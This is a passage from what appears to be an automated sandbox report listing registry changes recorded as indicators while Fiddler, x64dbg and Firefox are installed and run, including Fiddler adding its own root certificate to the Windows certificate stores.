\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\Wow64-VendorId = "0" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\Wow64-VersionHigh = "0" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\New Windows\PopupMgr = "0" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\Safety rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Fiddler.exe = "9999" FiddlerSetup.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\IEDevTools\Options rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\Suggested Sites rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\DXFeatureLevel = "0" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\Wow64-SubSysId = "0" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\Wow64-Revision = "0" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\Safety\PrivacIE rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\Main rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\Wow64-VersionLow = "0" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\AutoComplete rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\SubSysId = "0" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\Wow64-DXFeatureLevel = "0" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Software\Microsoft\Internet Explorer\TypedURLs Fiddler.exe -
Modifies data under HKEY_USERS 4 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133779367966157691" Fiddler.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client" svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry Fiddler.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry Fiddler.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Applications\crashreporter.exe\NoStartPage = "0" crashreporter.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" firefox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\shell\Debug with x64dbg\ = "Debug with x64dbg" x96dbg.exe Set value (str) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Fiddler.ArchiveZip\Shell\Open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Fiddler\\Fiddler.exe\" -noattach \"%1\"" FiddlerSetup.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Fiddler.ArchiveZip\Shell\Open &in Viewer\command FiddlerSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Applications\crashreporter.exe\NoOpenWith = "0" crashreporter.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11 firefox.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} firefox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\Debug with x64dbg\Command\ = "\"C:\\Users\\Admin\\Desktop\\release\\x96dbg.exe\" \"%1\"" x96dbg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\Debug with x64dbg\Icon = "\"C:\\Users\\Admin\\Desktop\\release\\x96dbg.exe\",0" x96dbg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.dd32\DefaultIcon\ = "C:\\Users\\Admin\\Desktop\\release\\x32\\x32dbg.exe" x96dbg.exe Set value (str) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Fiddler.ArchiveZip\PerceivedType = "compressed" FiddlerSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Fiddler.ArchiveZip\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Programs\\Fiddler\\SAZ.ico" FiddlerSetup.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Applications\crashreporter.exe crashreporter.exe Set value (data) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\Debug with x64dbg x96dbg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 firefox.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\shell x96dbg.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Applications\crashreporter.exe\IsHostApp = "0" crashreporter.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags firefox.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\shell\Debug with x64dbg\Command x96dbg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.dd32\DefaultIcon x96dbg.exe Set value (str) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Fiddler.ArchiveZip\Content Type = "application/vnd.telerik-fiddler.SessionArchive" FiddlerSetup.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Fiddler.ArchiveZip\DefaultIcon FiddlerSetup.exe Set value (data) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = ffffffff firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile x96dbg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\shell\Debug with x64dbg\Command\ = "\"C:\\Users\\Admin\\Desktop\\release\\x96dbg.exe\" \"%1\"" x96dbg.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Fiddler.ArchiveZip\Shell FiddlerSetup.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000003000000040000000200000000000000ffffffff firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\shell\Debug with x64dbg x96dbg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.dd64\ = "x64dbg_db" x96dbg.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\.saz FiddlerSetup.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Fiddler.ArchiveZip FiddlerSetup.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Fiddler.ArchiveZip\Shell\Open\command FiddlerSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Fiddler.ArchiveZip\Shell\Open &in Viewer\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Fiddler\\Fiddler.exe\" -viewer \"%1\"" FiddlerSetup.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings taskmgr.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" firefox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\Debug with x64dbg\ = "Debug with x64dbg" x96dbg.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Fiddler.ArchiveZip\Shell\Open FiddlerSetup.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell firefox.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\NodeSlot = "11" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Fiddler.ArchiveZip\ = "Fiddler Session Archive" FiddlerSetup.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" firefox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\shell\Debug with x64dbg\Icon = "\"C:\\Users\\Admin\\Desktop\\release\\x96dbg.exe\",0" x96dbg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.dd32 x96dbg.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\Debug with x64dbg\Command x96dbg.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Fiddler.ArchiveZip\Shell\Open &in Viewer FiddlerSetup.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Applications crashreporter.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings firefox.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Software\Microsoft\SystemCertificates\REQUEST Fiddler.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Software\Microsoft\SystemCertificates\REQUEST Fiddler.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\3ADE835AAA9EF8A3CAB06EFB817C4FC2BD6895DD Fiddler.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3ADE835AAA9EF8A3CAB06EFB817C4FC2BD6895DD\Blob = 0300000001000000140000003ade835aaa9ef8a3cab06efb817c4fc2bd6895dd2000000001000000b6030000308203b23082029aa00302010202107bbd26b0df6f729a4dbb4ccd7b6de262300d06092a864886f70d01010b05003067312b3029060355040b0c224372656174656420627920687474703a2f2f7777772e666964646c6572322e636f6d31153013060355040a0c0c444f5f4e4f545f54525553543121301f06035504030c18444f5f4e4f545f54525553545f466964646c6572526f6f74301e170d3234313132393035333331365a170d3237303232373035333331365a3067312b3029060355040b0c224372656174656420627920687474703a2f2f7777772e666964646c6572322e636f6d31153013060355040a0c0c444f5f4e4f545f54525553543121301f06035504030c18444f5f4e4f545f54525553545f466964646c6572526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100c9b3caf5647403b170e63a198aa161068b0481e8ddbce1e98643dbcfffea37177e42d8050e53dcd1f6fe7ea552e1f268ead79e3fedc99dd72298ce78785941b8790297848c6feb73fa9331cb316968f020e55433098a2a5edf31f653dd00ea1befe7274bf30848ebb49bb5b5d5ab50086440d6d440e904b1520a92bcb9b08d73e19fd2f6ae2040da7eabacdfd49a38efcfc7a7a2eb536ac6d2d39a3c0ddafe5430a56d6491467f254e43559406276b9ffc37c0cda161e3c594daade435eb2bf10153dc321290ed40ca64d4054da066093cff1b41eaf5a7ae682f47a175ee0a16f922cfd959f2f577de1327483f09aad1d85bf9235aa5d0834e2f2feceaab58a90203010001a35a305830130603551d25040c300a06082b0601050507030130120603551d130101ff040830060101ff020100301d0603551d0e04160414c6157f3f2dd3e64040f005b925a753e8b540784b300e0603551d0f0101ff040403020106300d06092a864886f70d01010b050003820101009ed90e639e5e873068d29f3a3b3b35313e008f00fc7beb66065cb52f1011fc7ad434b3927a979e87a24eda20110f2d5427f4341a66fcf2b9357b60b6cb50fd81ce332ba5e1605c5a53fe8caf70dab63c84aa7ea945fa87a4fd0e02dabc55a7412209a16056a1416343aed0b137e2339dc5cfc9fb8186b379d935e70241d2906b77b53d54f76a4fb778f7f469e66158636ef2ba7b81aada5c5d9bd3f5995c4b867e9f844b45b3b5b060878bb31a08900d3e34ae1e59b90c2e199f4dad74eaa1fed79a90c54e8443ef68c2ddfb44aa0a20650e2f326db8b03e4f5be9968a5f3973044cf4625e96741b87e74f7bcac3b123703ee365760e93c2888b6584fb5180cf TrustCert.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\3ADE835AAA9EF8A3CAB06EFB817C4FC2BD6895DD Fiddler.exe Set value (data) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\3ADE835AAA9EF8A3CAB06EFB817C4FC2BD6895DD\Blob = 04000000010000001000000056863442ad525de9fa2d187b2576cbd3140000000100000014000000c6157f3f2dd3e64040f005b925a753e8b540784b0200000001000000cc0000001c0000006c00000001000000000000000000000000000000020000007b00440034003200370039004300330035002d0035003800440032002d0034004400350042002d0042003800390039002d003400380042004300450034004200440044003300370034007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000003800000044004f005f004e004f0054005f00540052005500530054005f0046006900640064006c006500720052006f006f0074002d004300450000000300000001000000140000003ade835aaa9ef8a3cab06efb817c4fc2bd6895dd0f00000001000000200000008ae4280c01021425cc08d920a31cadb007d92229bf56228096fbbb24685635c1190000000100000010000000e29d9bb43c66db95784ea5d798b452f02000000001000000b6030000308203b23082029aa00302010202107bbd26b0df6f729a4dbb4ccd7b6de262300d06092a864886f70d01010b05003067312b3029060355040b0c224372656174656420627920687474703a2f2f7777772e666964646c6572322e636f6d31153013060355040a0c0c444f5f4e4f545f54525553543121301f06035504030c18444f5f4e4f545f54525553545f466964646c6572526f6f74301e170d3234313132393035333331365a170d3237303232373035333331365a3067312b3029060355040b0c224372656174656420627920687474703a2f2f7777772e666964646c6572322e636f6d31153013060355040a0c0c444f5f4e4f545f54525553543121301f06035504030c18444f5f4e4f545f54525553545f466964646c6572526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100c9b3caf5647403b170e63a198aa161068b0481e8ddbce1e98643dbcfffea37177e42d8050e53dcd1f6fe7ea552e1f268ead79e3fedc99dd72298ce78785941b8790297848c6feb73fa9331cb316968f020e55433098a2a5edf31f653dd00ea1befe7274bf30848ebb49bb5b5d5ab50086440d6d440e904b1520a92bcb9b08d73e19fd2f6ae2040da7eabacdfd49a38efcfc7a7a2eb536ac6d2d39a3c0ddafe5430a56d6491467f254e43559406276b9ffc37c0cda161e3c594daade435eb2bf10153dc321290ed40ca64d4054da066093cff1b41eaf5a7ae682f47a175ee0a16f922cfd959f2f577de1327483f09aad1d85bf9235aa5d0834e2f2feceaab58a90203010001a35a305830130603551d25040c300a06082b0601050507030130120603551d130101ff040830060101ff020100301d0603551d0e04160414c6157f3f2dd3e64040f005b925a753e8b540784b300e0603551d0f0101ff040403020106300d06092a864886f70d01010b050003820101009ed90e639e5e873068d29f3a3b3b35313e008f00fc7beb66065cb52f1011fc7ad434b3927a979e87a24eda20110f2d5427f4341a66fcf2b9357b60b6cb50fd81ce332ba5e1605c5a53fe8caf70dab63c84aa7ea945fa87a4fd0e02dabc55a7412209a16056a1416343aed0b137e2339dc5cfc9fb8186b379d935e70241d2906b77b53d54f76a4fb778f7f469e66158636ef2ba7b81aada5c5d9bd3f5995c4b867e9f844b45b3b5b060878bb31a08900d3e34ae1e59b90c2e199f4dad74eaa1fed79a90c54e8443ef68c2ddfb44aa0a20650e2f326db8b03e4f5be9968a5f3973044cf4625e96741b87e74f7bcac3b123703ee365760e93c2888b6584fb5180cf Fiddler.exe Set value (data) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\3ADE835AAA9EF8A3CAB06EFB817C4FC2BD6895DD\Blob = 5c000000010000000400000000080000190000000100000010000000e29d9bb43c66db95784ea5d798b452f00f00000001000000200000008ae4280c01021425cc08d920a31cadb007d92229bf56228096fbbb24685635c10300000001000000140000003ade835aaa9ef8a3cab06efb817c4fc2bd6895dd0b000000010000003800000044004f005f004e004f0054005f00540052005500530054005f0046006900640064006c006500720052006f006f0074002d004300450000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000020000007b00440034003200370039004300330035002d0035003800440032002d0034004400350042002d0042003800390039002d003400380042004300450034004200440044003300370034007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000140000000100000014000000c6157f3f2dd3e64040f005b925a753e8b540784b04000000010000001000000056863442ad525de9fa2d187b2576cbd32000000001000000b6030000308203b23082029aa00302010202107bbd26b0df6f729a4dbb4ccd7b6de262300d06092a864886f70d01010b05003067312b3029060355040b0c224372656174656420627920687474703a2f2f7777772e666964646c6572322e636f6d31153013060355040a0c0c444f5f4e4f545f54525553543121301f06035504030c18444f5f4e4f545f54525553545f466964646c6572526f6f74301e170d3234313132393035333331365a170d3237303232373035333331365a3067312b3029060355040b0c224372656174656420627920687474703a2f2f7777772e666964646c6572322e636f6d31153013060355040a0c0c444f5f4e4f545f54525553543121301f06035504030c18444f5f4e4f545f54525553545f466964646c6572526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100c9b3caf5647403b170e63a198aa161068b0481e8ddbce1e98643dbcfffea37177e42d8050e53dcd1f6fe7ea552e1f268ead79e3fedc99dd72298ce78785941b8790297848c6feb73fa9331cb316968f020e55433098a2a5edf31f653dd00ea1befe7274bf30848ebb49bb5b5d5ab50086440d6d440e904b1520a92bcb9b08d73e19fd2f6ae2040da7eabacdfd49a38efcfc7a7a2eb536ac6d2d39a3c0ddafe5430a56d6491467f254e43559406276b9ffc37c0cda161e3c594daade435eb2bf10153dc321290ed40ca64d4054da066093cff1b41eaf5a7ae682f47a175ee0a16f922cfd959f2f577de1327483f09aad1d85bf9235aa5d0834e2f2feceaab58a90203010001a35a305830130603551d25040c300a06082b0601050507030130120603551d130101ff040830060101ff020100301d0603551d0e04160414c6157f3f2dd3e64040f005b925a753e8b540784b300e0603551d0f0101ff040403020106300d06092a864886f70d01010b050003820101009ed90e639e5e873068d29f3a3b3b35313e008f00fc7beb66065cb52f1011fc7ad434b3927a979e87a24eda20110f2d5427f4341a66fcf2b9357b60b6cb50fd81ce332ba5e1605c5a53fe8caf70dab63c84aa7ea945fa87a4fd0e02dabc55a7412209a16056a1416343aed0b137e2339dc5cfc9fb8186b379d935e70241d2906b77b53d54f76a4fb778f7f469e66158636ef2ba7b81aada5c5d9bd3f5995c4b867e9f844b45b3b5b060878bb31a08900d3e34ae1e59b90c2e199f4dad74eaa1fed79a90c54e8443ef68c2ddfb44aa0a20650e2f326db8b03e4f5be9968a5f3973044cf4625e96741b87e74f7bcac3b123703ee365760e93c2888b6584fb5180cf Fiddler.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3ADE835AAA9EF8A3CAB06EFB817C4FC2BD6895DD Fiddler.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3ADE835AAA9EF8A3CAB06EFB817C4FC2BD6895DD\Blob = 04000000010000001000000056863442ad525de9fa2d187b2576cbd3140000000100000014000000c6157f3f2dd3e64040f005b925a753e8b540784b0300000001000000140000003ade835aaa9ef8a3cab06efb817c4fc2bd6895dd0f00000001000000200000008ae4280c01021425cc08d920a31cadb007d92229bf56228096fbbb24685635c1190000000100000010000000e29d9bb43c66db95784ea5d798b452f02000000001000000b6030000308203b23082029aa00302010202107bbd26b0df6f729a4dbb4ccd7b6de262300d06092a864886f70d01010b05003067312b3029060355040b0c224372656174656420627920687474703a2f2f7777772e666964646c6572322e636f6d31153013060355040a0c0c444f5f4e4f545f54525553543121301f06035504030c18444f5f4e4f545f54525553545f466964646c6572526f6f74301e170d3234313132393035333331365a170d3237303232373035333331365a3067312b3029060355040b0c224372656174656420627920687474703a2f2f7777772e666964646c6572322e636f6d31153013060355040a0c0c444f5f4e4f545f54525553543121301f06035504030c18444f5f4e4f545f54525553545f466964646c6572526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100c9b3caf5647403b170e63a198aa161068b0481e8ddbce1e98643dbcfffea37177e42d8050e53dcd1f6fe7ea552e1f268ead79e3fedc99dd72298ce78785941b8790297848c6feb73fa9331cb316968f020e55433098a2a5edf31f653dd00ea1befe7274bf30848ebb49bb5b5d5ab50086440d6d440e904b1520a92bcb9b08d73e19fd2f6ae2040da7eabacdfd49a38efcfc7a7a2eb536ac6d2d39a3c0ddafe5430a56d6491467f254e43559406276b9ffc37c0cda161e3c594daade435eb2bf10153dc321290ed40ca64d4054da066093cff1b41eaf5a7ae682f47a175ee0a16f922cfd959f2f577de1327483f09aad1d85bf9235aa5d0834e2f2feceaab58a90203010001a35a305830130603551d25040c300a06082b0601050507030130120603551d130101ff040830060101ff020100301d0603551d0e04160414c6157f3f2dd3e64040f005b925a753e8b540784b300e0603551d0f0101ff040403020106300d06092a864886f70d01010b050003820101009ed90e639e5e873068d29f3a3b3b35313e008f00fc7beb66065cb52f1011fc7ad434b3927a979e87a24eda20110f2d5427f4341a66fcf2b9357b60b6cb50fd81ce332ba5e1605c5a53fe8caf70dab63c84aa7ea945fa87a4fd0e02dabc55a7412209a16056a1416343aed0b137e2339dc5cfc9fb8186b379d935e70241d2906b77b53d54f76a4fb778f7f469e66158636ef2ba7b81aada5c5d9bd3f5995c4b867e9f844b45b3b5b060878bb31a08900d3e34ae1e59b90c2e199f4dad74eaa1fed79a90c54e8443ef68c2ddfb44aa0a20650e2f326db8b03e4f5be9968a5f3973044cf4625e96741b87e74f7bcac3b123703ee365760e93c2888b6584fb5180cf Fiddler.exe Set value (data) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\3ADE835AAA9EF8A3CAB06EFB817C4FC2BD6895DD\Blob = 04000000010000001000000056863442ad525de9fa2d187b2576cbd30f00000001000000200000008ae4280c01021425cc08d920a31cadb007d92229bf56228096fbbb24685635c1140000000100000014000000c6157f3f2dd3e64040f005b925a753e8b540784b190000000100000010000000e29d9bb43c66db95784ea5d798b452f00300000001000000140000003ade835aaa9ef8a3cab06efb817c4fc2bd6895dd5c0000000100000004000000000800002000000001000000b6030000308203b23082029aa00302010202107bbd26b0df6f729a4dbb4ccd7b6de262300d06092a864886f70d01010b05003067312b3029060355040b0c224372656174656420627920687474703a2f2f7777772e666964646c6572322e636f6d31153013060355040a0c0c444f5f4e4f545f54525553543121301f06035504030c18444f5f4e4f545f54525553545f466964646c6572526f6f74301e170d3234313132393035333331365a170d3237303232373035333331365a3067312b3029060355040b0c224372656174656420627920687474703a2f2f7777772e666964646c6572322e636f6d31153013060355040a0c0c444f5f4e4f545f54525553543121301f06035504030c18444f5f4e4f545f54525553545f466964646c6572526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100c9b3caf5647403b170e63a198aa161068b0481e8ddbce1e98643dbcfffea37177e42d8050e53dcd1f6fe7ea552e1f268ead79e3fedc99dd72298ce78785941b8790297848c6feb73fa9331cb316968f020e55433098a2a5edf31f653dd00ea1befe7274bf30848ebb49bb5b5d5ab50086440d6d440e904b1520a92bcb9b08d73e19fd2f6ae2040da7eabacdfd49a38efcfc7a7a2eb536ac6d2d39a3c0ddafe5430a56d6491467f254e43559406276b9ffc37c0cda161e3c594daade435eb2bf10153dc321290ed40ca64d4054da066093cff1b41eaf5a7ae682f47a175ee0a16f922cfd959f2f577de1327483f09aad1d85bf9235aa5d0834e2f2feceaab58a90203010001a35a305830130603551d25040c300a06082b0601050507030130120603551d130101ff040830060101ff020100301d0603551d0e04160414c6157f3f2dd3e64040f005b925a753e8b540784b300e0603551d0f0101ff040403020106300d06092a864886f70d01010b050003820101009ed90e639e5e873068d29f3a3b3b35313e008f00fc7beb66065cb52f1011fc7ad434b3927a979e87a24eda20110f2d5427f4341a66fcf2b9357b60b6cb50fd81ce332ba5e1605c5a53fe8caf70dab63c84aa7ea945fa87a4fd0e02dabc55a7412209a16056a1416343aed0b137e2339dc5c